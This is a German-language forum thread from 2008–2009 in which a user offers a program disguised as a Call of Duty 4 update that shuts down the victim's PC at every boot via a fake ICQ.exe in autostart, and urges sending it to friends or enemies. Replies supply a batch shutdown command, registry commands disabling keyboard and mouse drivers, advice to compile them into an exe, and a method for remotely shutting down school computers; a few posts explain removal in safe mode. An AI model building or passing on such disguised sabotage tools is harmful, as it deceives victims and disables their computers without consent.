myGully.com

myGully.com (https://mygully.com/index.php)
-   Sicherheit & Anonymität (https://mygully.com/forumdisplay.php?f=65)
-   -   Pc-Shutdown (https://mygully.com/showthread.php?t=1818338)

Veni_Vidi_Vici 04.11.08 14:37

Pc-Shutdown
 
Hi.
Hab ein kleines Programm geschrieben (getarnt als Call of Duty 4.exe), dass, sobald jemand die exe ausführt der Pc herruntergefahren wird. Dieses Programm speichert sich dann in Autostart.
Somit wird bei jedem rauffahren der Pc wieder runtergefahren.
Schickt den Downloadlink einfach euren Freunden/Feinden und sagt es wär ein Update für Call of Duty 4 oder ein Key oder ein kleines Call of Duty 4 Minispiel......
Wird von allen mir bekannten Antivirprogrammen nicht angezeigt.
[Link nur für registrierte und freigeschaltete Mitglieder sichtbar. Jetzt registrieren...]

jackieninos 04.11.08 15:58

der alte gute Batch befehl

@echo off
shutdown -s -f -t 0

GT3X 04.11.08 17:22

wow is das 1337!

Abgesicherter mode -> autostat / reg key rauskicken gut is >_>

hau wenigstens noch was rein was was bringt z.B. das die maus disabled is w/e

Dr.Doom 04.11.08 17:22

is ja geil und wie kriegt man das weg ?

Veni_Vidi_Vici 04.11.08 17:29

Zitat:

Zitat von GT3X (Beitrag 19568371)
wow is das 1337!

Abgesicherter mode -> autostat / reg key rauskicken gut is >_>

hau wenigstens noch was rein was was bringt z.B. das die maus disabled is w/e

Es soll ja auch nicht direkt ein Trojaner sein, sondern nur um Freunde/Feinde bisschen zu ärgern.
Aber für die die sich nicht auskennen ist es nicht gerade leicht wegzubekommen.
Selbst wenn man sich auskennt, muss man erstmal wissen, dass es die ICQ.exe ist und nicht die Call of Duty 4.exe die in Autostart gespeichert wird, da die ICQ.exe genauso wie´s Original aussieht

Ach ja, und was soll das helfen, wenn ich noch die maus disable? Kommst ja nicht wirklich mehr dazu die Maus zu benutzen

GT3X 04.11.08 17:40

Da is ein gewaltiger unterschied zwischen einem Trojaner und einem batch s***** ^^

Was das bringen soll?^^
nichts :D was solls bringen das du jemand seinen pc immer wieder runterfahren willst^^

mortus 05.11.08 08:22

da is es doch einfacher das du die reg key für die shell rausschmeisst, dann hat er kein startmenü und keine desktop icons. nervt mehr als nur ein shutdown.

Dr.Doom 05.11.08 15:29

hi, könnt ihr nochmal sowas machen getarnt als cod4 exe. aber bitte noch fieser z.B. maus funzt net oda so. sodass der typ der die exe öffnet richtig probleme kriegt.

Veni_Vidi_Vici 05.11.08 16:15

Jetzt verdammt, was habt ihr immer mit eurer scheiß Maus??!!??
Da der Pc sowieso runterfährt ist es doch scheißegal ob die Maus funktioniert oder nicht, weil du nichtmal soweit kommst, um sie zu verwenden.

GT3X 08.11.08 20:31

Zitat:

Zitat von Dr.Doom (Beitrag 19569283)
hi, könnt ihr nochmal sowas machen getarnt als cod4 exe. aber bitte noch fieser z.B. maus funzt net oda so. sodass der typ der die exe öffnet richtig probleme kriegt.

Hier der befehl bzw. reg key um die maus zu disablen. Einfach inne batch reinkloppen inclusive shutdown und dann dann mit irgend nem batchcompiler zur ner exe compilen

Code:

reg add "HKLM\System\CurrentControlSet\Services\Kbdclass" /v Start /t REG_DWORD /d "4" /f > nul
reg add "HKLM\System\CurrentControlSet\Services\Mouclass" /v Start /t REG_DWORD /d "4" /f > nul


Dr.Doom 09.11.08 10:27

Zitat:

Zitat von GT3X (Beitrag 19572829)
Hier der befehl bzw. reg key um die maus zu disablen. Einfach inne batch reinkloppen inclusive shutdown und dann dann mit irgend nem batchcompiler zur ner exe compilen

Code:

reg add "HKLM\System\CurrentControlSet\Services\Kbdclass" /v Start /t REG_DWORD /d "4" /f > nul
reg add "HKLM\System\CurrentControlSet\Services\Mouclass" /v Start /t REG_DWORD /d "4" /f > nul


cool thx für den aufwand. wie kriegt man das alles weg ?

GT3X 09.11.08 15:37

PC im Abgesicherten Modus booten und dann die entsprechenden Regkeys entfernen.

DiMi10 13.11.08 17:16

Das hab ich mal bei mir in der Schule gemacht ^^
bei ausführen cmd eingeben
dann öffnet sich ein fenster da gebt ihr folgendes ein "shutdown -i" ohne ""
dann sollte sich ein neues fenster öffnen das heißt Remotecomputer herunterfahren
dort müsst ihr für pc = ic+COMPUTER NUMMER Eingeben und für Laptop= nb+NUMMER
alsoo soo sollte es dann z.B aussehen
ic22 oder nb22 dann auf ok klicken
dann könnt ihr noch die nachrricht wählen die auf dem computer angezeigt werden soll das könnt ihr aber weglassen wenn ihr wollt ...^^


Was mich interressiert könnte man i-wie auf den Pc zugreifen und sehen das auch auf meinen bildschirm angezeigt wird.Kann mir vill jemand wie das geht ?

GT3X 13.11.08 18:07

Geh nich übers netzwerk es sei denn dein remote pc hat vnc oder sonstiges installiert und du weißt das pw

freak59 16.01.09 19:50

und woher kennt man die pc nummer?

kann man irgendeine hineingeben, oder wie?

affe3 14.10.09 18:45

Nur doof, das Autostart-Einträge auch gelöscht bzw. nicht geladen werden können. Nur so: Umschalttaste drücken (oder irgendwas mit strg oder alt Taste und Umschalt.)

Kommt jetzt drauf an, wie klug oder dumm du dich angestellt hast, wenn du dich doof angestellt hast, kann man das ohne Admin-rechte zu haben und ohne Neustart ändern. Wenn du klug bist, kann man es nicht so schnell, aber ich möchte dir da wirklich keine Tipps geben, da selbst lesen immer besser ist, als einem gleich alles nachzutragen.

:D

Ich weis aus Erfahrung, dass dann die ,,möchte gern Hacker" so tun, als könnten sie es, aber sowas hasse ich. Wer es kann, der bekommt von mir die Infos, aber diejenigen würden sowas gleich gar nicht fragen, also nun weist du auch meine Gründe, warum ich nix sage.:D

scheuerlappen 15.10.09 16:39

währe shön wenn das mal einer auf rs uppen könnte

dankööö

bruderliebe 15.10.09 18:58

Das ist sau alt...
Batch virus als exe umgewandelt...
@Veni_Vidi_Vice, der eh schon gebannt is aber egal:
Abgesicherter Modus, da werden nur die Windows sachen gestartet... dann haut man den Virus einfach wieder aus dem Autostart....

Früher gabs das noch als VB datei :D


Alle Zeitangaben in WEZ +1. Es ist jetzt 02:24 Uhr.

Powered by vBulletin® (Deutsch)
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.